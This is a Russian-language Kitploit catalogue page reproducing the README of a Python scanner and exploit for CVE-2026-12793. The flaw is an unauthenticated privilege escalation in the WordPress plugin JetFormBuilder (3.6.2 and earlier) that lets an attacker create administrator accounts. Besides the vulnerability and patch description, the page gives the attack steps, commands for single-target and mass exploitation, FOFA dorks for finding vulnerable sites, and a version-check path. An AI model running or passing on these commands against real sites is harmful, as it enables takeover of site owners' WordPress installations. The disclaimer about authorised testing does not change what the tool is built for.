Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-12793 — Python PoC-сканер и эксплойт для CVE-2026-12793 — неаутентифицированного повышения привилегий в JetFormBuilder <=3.6.2, позволяющего создавать учётные записи администратора WordPress. | Kitploit
Инструменты/GitHubGitHub/murrez/cve-2026-12793
Повышение привилегийРазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubmurrez/cve-2026-12793
11 ч 16 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-12793

Python PoC-сканер и эксплойт для CVE-2026-12793 — неаутентифицированного повышения привилегий в JetFormBuilder <=3.6.2, позволяющего создавать учётные записи администратора WordPress.

Репозиторий

CVE-2026-12793 — Неаутентифицированное повышение привилегий в JetFormBuilder

Сканер и эксплойт proof-of-concept для CVE-2026-12793 в WordPress-плагине JetFormBuilder — Dynamic Blocks Form Builder (Crocoblock).

CVECVE-2026-12793
Плагинjetformbuilder
Затронуто≤ 3.6.2
Исправлено в3.6.2.1+
CVSS9.8 Critical
АутентификацияНе требуется
CWECWE-269 — Improper Privilege Management
Исследовательdaroo (Wordfence)

Уязвимость

Плагин не проверяет, что _jet_engine_booking_form_id ссылается на опубликованный пользовательский тип записи jet-form-builder, прежде чем загрузить содержимое блоков указанной записи как схему формы и выполнить действия после отправки формы.

Неаутентифицированный злоумышленник может отправить специально сформированный AJAX-запрос, чтобы вызвать действие Register User (wp_insert_user) и создать новую учётную запись WordPress. Если целевая форма неправильно настроена с повышенной ролью (например, administrator), это приводит к полному захвату сайта.

Сценарий атаки

root@kitploit:~
1. Detect JetFormBuilder + version ≤ 3.6.2 (readme.txt)
2. Discover form ID from public pages (data-form-id, /register/, etc.)
3. POST to referer page with ?jet_form_builder_submit=submit&method=ajax
4. Register User action runs → new WP user created

Патч (3.6.2.1)

  • Block_Helper::is_valid_form_post() — принимается только опубликованный CPT jet-form-builder
  • Form_Handler::set_form_id() отклоняет недопустимые ID форм
  • Усиление валидации SSR (wp_insert_user / wp_update_user блокируются как колбэки)

Требования

  • Python 3.8+
  • requests
root@kitploit:~
pip install requests urllib3

Использование

Одиночная цель — проверка

root@kitploit:~
python poc.py -u https://target.example --mode check

Массовое сканирование

root@kitploit:~
python poc.py --list domains.txt --mode check --threads 30 --quiet

Форматы входных данных: один домен/URL на строку, FOFA CSV (host,domain) или candidates.jsonl из предыдущего запуска.

Эксплуатация (одиночная цель)

root@kitploit:~
python poc.py -u https://target.example --mode exploit \
  --form-id 1858 \
  --page-url /register/ \
  --fields login=cadastro_nome,email=cadastro_mail,password=cadastro_senha \
  --username myuser \
  --email [email protected] \
  --password 'SecurePass123!' \
  --verify

Массовая эксплуатация по кандидатам

root@kitploit:~
python poc.py --list candidates.jsonl --mode exploit --threads 10 --verify

Опции

Выходные файлы

ФайлСодержимое
hits.txt

Пример записи кандидата

root@kitploit:~
{
  "target": "https://target.example",
  "version": "3.3.3",
  "form_id": 1858,
  "page_url": "https://target.example/register/",
  "fields": {
    "login": "user_login",
    "email": "user_email",
    "password": "user_pass"
  }
}

Автоматически определяемые имена полей являются эвристическими. Всегда проверяйте и переопределяйте их с помощью --fields перед эксплуатацией.

Обнаружение / дорки FOFA

root@kitploit:~
body="/wp-content/plugins/jetformbuilder/"
body="jet-form-builder" && body="wp-content"
header="/wp-content/plugins/jetformbuilder/"
title="WordPress" && body="data-form-id"

Проверка версии:

root@kitploit:~
/wp-content/plugins/jetformbuilder/readme.txt

Ищите Stable tag: ≤ 3.6.2.

Ссылки

  • NVD — CVE-2026-12793
  • Wordfence Threat Intel
  • Patchstack
  • WordPress.org changeset
  • GitHub fix commit

Отказ от ответственности

Этот инструмент предоставляется исключительно для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным. Авторы не несут ответственности за неправомерное использование.

Лицензия

MIT

Скачать инструмент
ФлагОписание
-u, --urlURL одиночной цели
--listФайл со списком целей
--modecheck (по умолчанию) или exploit
--form-idИзвестный ID записи формы JetFormBuilder
--page-urlСтраница, содержащая форму (referer), например /register/
--fieldsСопоставление полей: login=x,email=y,password=z
--pathsДополнительные пути для обхода в поисках форм
--username / --email / --passwordУчётные данные для эксплуатации (случайные, если не указаны)
--verifyПроверить учётную запись через wp-login.php после отправки
-j, --threadsРабочие потоки (по умолчанию: 20)
--timeoutТайм-аут HTTP в секундах (по умолчанию: 20)
--proxyURL HTTP(S)-прокси
--outputПолный JSONL-лог (по умолчанию: cve_2026_12793_results.jsonl)
--vuln-listСписок попаданий (по умолчанию: hits.txt)
--candidates-listJSONL кандидатов (по умолчанию: candidates.jsonl)
-q, --quietВыводить только прогресс
URL уязвимых / проэксплуатированных целей
candidates.jsonlЦели с доступной проверкой Register User (form_id, page_url, fields)
cve_2026_12793_results.jsonlПолные JSON-результаты по каждой цели